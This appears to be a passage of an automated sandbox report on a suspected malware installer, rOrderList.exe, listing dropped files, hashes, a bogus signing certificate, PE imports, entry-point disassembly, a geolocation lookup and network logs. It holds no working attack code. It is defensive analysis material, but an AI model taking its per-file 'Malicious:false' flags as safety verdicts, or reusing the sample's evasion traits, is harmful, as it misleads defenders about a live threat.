                                                                                    SHA-512:0490167372BD87CAA70410C3D6E00BE41DE7572ABA5D0B768558639CCA76B2DC05D94B8417A2E5113F48A644A90CB57C2CB65183718CBCAE88FAE89CCDF4DC69
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1..`..?E...8x.....C..sq.".'O....nN.E....A..4.....!/....$....zV........9.."..{..\..p..N..v.V...'..< ......;0S.B..rK..D u.$P;..K...K...R.Y|9h.........g.&....O.....]....|....IEND.B`.
                                                                                    Process:C:\Users\user\Desktop\rOrderList.exe
                                                                                    File Type:C source, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1933
                                                                                    Entropy (8bit):4.876415491019676
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:wTUJDC+pa/IBg2yasXQd8+HuaOTREkZDnrLAfTlXXyQ4mJWp8tUXTR0tUX1ytUXI:wTUJD2/ZQ8+Hu9ZUfxHWm4cUXEUXqUXI
                                                                                    MD5:22C40B54079919EBCE7D950784C15A30
                                                                                    SHA1:A69861C297711EE8FAA81219AF3D5ADA9505A813
                                                                                    SHA-256:D4E76F86B558E4066B23E4709445C453272D01396233EB13778C4C8D2D4AA41C
                                                                                    SHA-512:AC0A5A9A5613C4135ACB76D99C5898B120F7788F9003AEA38AFFE0AC4AEAC79F91EBC8D92845A5880D63ADD6F3BEFC819A35E26FA771EF13CDE4B80A66C6EC9E
                                                                                    Malicious:false
                                                                                    Preview:/*.** 2020-01-08.**.** The author disclaims copyright to this source code. In place of.** a legal notice, here is a blessing:.**.** May you do good and not evil..** May you find forgiveness for yourself and forgive others..** May you share freely, never taking more than you give..**.******************************************************************************.**.** This SQLite extension implements a noop() function used for testing..**.** Variants:.**.** noop(X) The default. Deterministic..** noop_i(X) Deterministic and innocuous..** noop_do(X) Deterministic and direct-only..** noop_nd(X) Non-deterministic..*/.#include "sqlite3ext.h".SQLITE_EXTENSION_INIT1.#include <assert.h>.#include <string.h>../*.** Implementation of the noop() function..**.** The function returns its argument, unchanged..*/.static void noopfunc(. sqlite3_context *context,. int argc,. sqlite3_value **argv.){. assert( argc==1 );. sqlite3_result_value(contex
                                                                                    Process:C:\Users\user\Desktop\rOrderList.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):617
                                                                                    Entropy (8bit):7.340370035169012
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:6v/7wtZNGfN/qk9y0C0atD+DlgfhfcPuZ9/Vm7H06gOiHEyf:XtvGV/rcIqfh0yJ8r0kHyf
                                                                                    MD5:799634FEC0C36CBE5F2957E92AAC1EA5
                                                                                    SHA1:9B8B066955A6C7A7F2C5C02EDE4A985523073A5A
                                                                                    SHA-256:AF9005D6D335C391EB5C9C416A72221D1BFFFEAF3402FDC5C8FD658418FF6A78
                                                                                    SHA-512:416D5D4B259ACAA9CECFF2FEFBADB0A8D806F0F2F3E3BBDCD54924BA6C4371F36CD957855033C620ABB9F3EA94D98A7EF95BE60106063643DFB850347FBF3430
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtAuthor.Lapo Calamandrei..*...'tEXtDescription.Based of Jakub Steiner work.)8_....IDAT8...KkSQ...s...*IS...~.v..)t..{.P.".w-....]..*..]..Z..4Ms.p.3.n.m.....0.......G.....I..../.n=....dY......jf!.h.[.......`..`VV.<.....$.....$.........d....'.7..dm}}....O..|...p'.K.*"27+.*..^.r.-.i.....E......S........D.....;..M...*....>.Q.M....#....^.>.RK......N...T..)V.*@.s....9.....H.6..D.....p..........3.`|...Wz.{.&..s.8h..no..1F.ohabccM...o.?.......i...C.i..,.?~..+Z...}..T.k....IEND.B`.
                                                                                    Process:C:\Users\user\Desktop\rOrderList.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):27064
                                                                                    Entropy (8bit):6.487890220496693
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:AlbGcRfTq2LuTY7bTjAYYJHAOUhxrYv2nzN3JcvDG/GhIqtddu:AlbPq2iYjjYBAOUhZg4zFYDGeh7ddu
                                                                                    MD5:67277EB19D505EDCB65B63B0ECD0F38F
                                                                                    SHA1:83396964D16015D766C28FEE897BEB3CC9DC8452
                                                                                    SHA-256:43D4795C4EA61E199349EB075263AFFC0CA537854185E208837656CC9F1AB98B
                                                                                    SHA-512:9EA2EA025E845B4E4759BB4DDD95F7438E05AB2A4F7BEBC8D4281EB33F6128F9A6A3A321E696BECD1F9EB4E654A042BF16522883A1DF4F85A32CD923F56BC18B
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: RFQ_-_KDF202304778.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ_-_KDF202304778.exe, Detection: malicious, Browse
                                                                                    • Filename: rKabelimpedansen.exe, Detection: malicious, Browse
                                                                                    • Filename: rKabelimpedansen.exe, Detection: malicious, Browse
                                                                                    • Filename: Parfumens.exe, Detection: malicious, Browse
                                                                                    • Filename: Parfumens.exe, Detection: malicious, Browse
                                                                                    • Filename: Predefying.exe, Detection: malicious, Browse
                                                                                    • Filename: Musculophrenic.exe, Detection: malicious, Browse
                                                                                    • Filename: Socialdirektrers.exe, Detection: malicious, Browse
                                                                                    • Filename: Jequirity.exe, Detection: malicious, Browse
                                                                                    • Filename: Socialdirektrers.exe, Detection: malicious, Browse
                                                                                    • Filename: Predefying.exe, Detection: malicious, Browse
                                                                                    • Filename: Musculophrenic.exe, Detection: malicious, Browse
                                                                                    • Filename: Jequirity.exe, Detection: malicious, Browse
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....#b.........."!.....*.........../....................................................@A........................(D.......E..x....p...............J.............. C...............................B...............G..(............................text....(.......*.................. ..`.rdata.......@......................@..@.data........P.......>..............@....00cfg.......`.......@..............@..@.rsrc........p.......B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):943
                                                                                    Entropy (8bit):4.9888715245538995
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:tkEIend6CsGkMyGWKyMPVGADRPrmai+H0mGdAPORkoao9W7im51w7CSD9pF6RjSW:qmdRNuKyM8kzst7266m7RJaCg
                                                                                    MD5:692773573FB2B62534BF18FF4EBE0B2F
                                                                                    SHA1:60C0D61867AC7DB949B9BD00C9760DF8CC7659E8
                                                                                    SHA-256:034E54E94434D9876D37034F0DA4F3267DE0898F874598E3C0CBD4C174E5EFFC
                                                                                    SHA-512:F4D984125D6837B9B578F51D05139185FEF0AC99FDF413417C0D7C8D786C8747F4EA33275971AA912BB792D9F3E2C03C18E9FD4B7F0DC6B95F642FA155F17602
                                                                                    Malicious:false
                                                                                    Preview:{. "geoplugin_request":"102.129.143.5",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Hunenberg",. "geoplugin_region":"Zug",. "geoplugin_regionCode":"ZG",. "geoplugin_regionName":"Zug",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.173",. "geoplugin_longitude":"8.4204",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.8873.}
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):8003
                                                                                    Entropy (8bit):4.841989710132343
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                                                                                    MD5:677C4E3A07935751EA3B092A5E23232F
                                                                                    SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                                                                                    SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                                                                                    SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):16116
                                                                                    Entropy (8bit):5.442634547469111
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:Rg8W599+VzvuzWXBiWJk+o9o2TAT6seYk+Dt/IR3SoENYgrjEwsPB:8ALUcoLjo2TA8WxQSFHfEwA
                                                                                    MD5:C0DD4D87E1E801022485952B8C22B7E6
                                                                                    SHA1:1218D42AD0D4E81D1C3EC9D32B744A31D05421C3
                                                                                    SHA-256:231185294B20D9B12AE585CBBD48128265422C5C7A2FB6D2CEDA7A00A7406F98
                                                                                    SHA-512:AC516333CC351DCBA15F606A049B69DB36F84A59B761CB28E724AA19D46613149D74ACF2929B6C1CC6916EE98D31E6E6E6EFC5A1D042869A1AA517EA15B9CB93
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................H...............o..b~.D.poM...)..... .Microsoft.PowerShell.ConsoleHostD................g$H..K..I.....>.......System.Management.Automation4...............-..Q...H..g............System.Core.0..................)W_tD...B..T.........System..4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@...............8Ak....G.......j........System.DirectoryServices<.................YS.eE..9.G...........System.Management...4...................2.8F.....S.........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\Desktop\rOrderList.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):305702
                                                                                    Entropy (8bit):7.669988717168245
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:LvMppfsd4JGvusneGMrfYrZrIxI9OzIifXXgXdEVQz9:kpfsd4auseBrfoR9OzLXidE49
                                                                                    MD5:F697F2F9B718091AC30AC404A59986FA
                                                                                    SHA1:402F554FFC9EAD758CE820C620A3CEFF6E93D5AC
                                                                                    SHA-256:B61EF4B5EF1A4DCB8FB901DE9FCD7F340E42027CB6CAC8DBD3309904526B09BD
                                                                                    SHA-512:D330CD83498D28EF34E3EA2EF3C4239D9EC5603F4F83E49521C342EC05582E32416436F3D2B5EC2ECB1B6ACCE8CC4D3FB06B3F692D1C4EE25446C0D09A29A048
                                                                                    Malicious:false
                                                                                    Preview:>/......,...................T...........x.......>/..........................................................................................................................................................................................................................................G...]...............j...............................................................................................................................................(..."...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):6.672866922475265
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:rOrderList.exe
                                                                                    File size:562240
                                                                                    MD5:8fc2e883931e5b10652a053fd52c372a
                                                                                    SHA1:0107d0425be941af467a7ce7f560d9e6177764f2
                                                                                    SHA256:23900cecd289350547647157100876e2f0cd92fac6a8f4354a5bdd8e2d3dea3b
                                                                                    SHA512:805e58f9cbf701ae64a50e5d51975db5c34d748aabb26f749b49a94bf0a6684fb1defe13cc7e3aef57a1856a43a9e6a9d16fde4da124337821340c971b3de38b
                                                                                    SSDEEP:12288:Pg/9QredHGfxsZSS+LYc+b7H/n5zDF8Tt5SiVZQ91C6Z:PglQredHSxsSS+LYc+b7fdDF8B5SiI9L
                                                                                    TLSH:84C4AE46A3344395E55D9A305C9B483B6F683E3B86F5152FB2847E0D6373A6CF40AE0B
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....
                                                                                    Icon Hash:4899b898f23a9831
                                                                                    Entrypoint:0x4035d8
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x5F24A992 [Fri Jul 31 23:30:26 2020 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:c05041e01f84e1ccca9c4451f3b6a383
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:E=Opacifier@Dekorationerne.Fil, OU="Supersensual Saleroom Checkerboard ", O=Rapper, L=Dieppe, S=Normandie, C=FR
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 26/09/2022 08:35:03 25/09/2025 08:35:03
                                                                                    Subject Chain
                                                                                    • E=Opacifier@Dekorationerne.Fil, OU="Supersensual Saleroom Checkerboard ", O=Rapper, L=Dieppe, S=Normandie, C=FR
                                                                                    Version:3
                                                                                    Thumbprint MD5:84971622DA02EA770EC95B13986029B4
                                                                                    Thumbprint SHA-1:06DB8DB9D1AE9B3267C3C8379B48CB3075800EAA
                                                                                    Thumbprint SHA-256:867880AF40643C3EDC27D951DF0D85200550EC12B555B7BF09796F02008522F8
                                                                                    Serial:3DF0B1AD4469F5F1EED28A7E99B43CF0F98A4FE6
                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004080C8h]
                                                                                    call dword ptr [004080CCh]
                                                                                    and eax, BFFFFFFFh
                                                                                    cmp ax, 00000006h
                                                                                    mov dword ptr [0042A26Ch], eax
                                                                                    je 00007FEE70513EF3h
                                                                                    push ebx
                                                                                    call 00007FEE705171F9h
                                                                                    cmp eax, ebx
                                                                                    je 00007FEE70513EE9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004082B0h
                                                                                    push esi
                                                                                    call 00007FEE70517173h
                                                                                    push esi
                                                                                    call dword ptr [00408154h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007FEE70513ECCh
                                                                                    push 0000000Bh
                                                                                    call 00007FEE705171CCh
                                                                                    push 00000009h
                                                                                    call 00007FEE705171C5h
                                                                                    push 00000007h
                                                                                    mov dword ptr [0042A264h], eax
                                                                                    call 00007FEE705171B9h
                                                                                    cmp eax, ebx
                                                                                    je 00007FEE70513EF1h
                                                                                    push 0000001Eh
                                                                                    call eax
                                                                                    test eax, eax
                                                                                    je 00007FEE70513EE9h
                                                                                    or byte ptr [0042A26Fh], 00000040h
                                                                                    push ebp
                                                                                    call dword ptr [00408038h]
                                                                                    push ebx
                                                                                    call dword ptr [00408298h]
                                                                                    mov dword ptr [0042A338h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 00421708h
                                                                                    call dword ptr [0040818Ch]
                                                                                    push 0040A384h
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x42888.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x872100x2230.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x65720x6600False0.6623008578431373data6.453919385955138IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x13980x1400False0.449609375data5.1367175827370986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x203780x600False0.5078125data4.096809083627214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x2b0000x250000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x500000x428880x42a00False0.2976701747185741data4.639696668646797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x501c00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States
                                                                                    RT_DIALOG0x921e80x100dataEnglishUnited States
                                                                                    RT_DIALOG0x922e80x11cdataEnglishUnited States
                                                                                    RT_DIALOG0x924080xc4dataEnglishUnited States
                                                                                    RT_DIALOG0x924d00x60dataEnglishUnited States
                                                                                    RT_GROUP_ICON0x925300x14dataEnglishUnited States
                                                                                    RT_MANIFEST0x925480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                                                                                    DLLImport
                                                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 26, 2023 16:44:25.857244015 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:25.857331038 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:25.857588053 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:25.890177011 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:25.890194893 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:25.934386969 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:25.934587002 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:25.935760021 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:25.936002016 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:26.035938025 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:26.035999060 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.037220001 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.037344933 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:26.041271925 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:26.088047981 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.419136047 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.419457912 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:26.419526100 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.419677973 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:26.419759989 CEST49796443192.168.11.20142.250.186.174
                                                                                    Apr 26, 2023 16:44:26.419800043 CEST44349796142.250.186.174192.168.11.20
                                                                                    Apr 26, 2023 16:44:26.419970036 CEST49796443192.168.11.20142.250.186.174
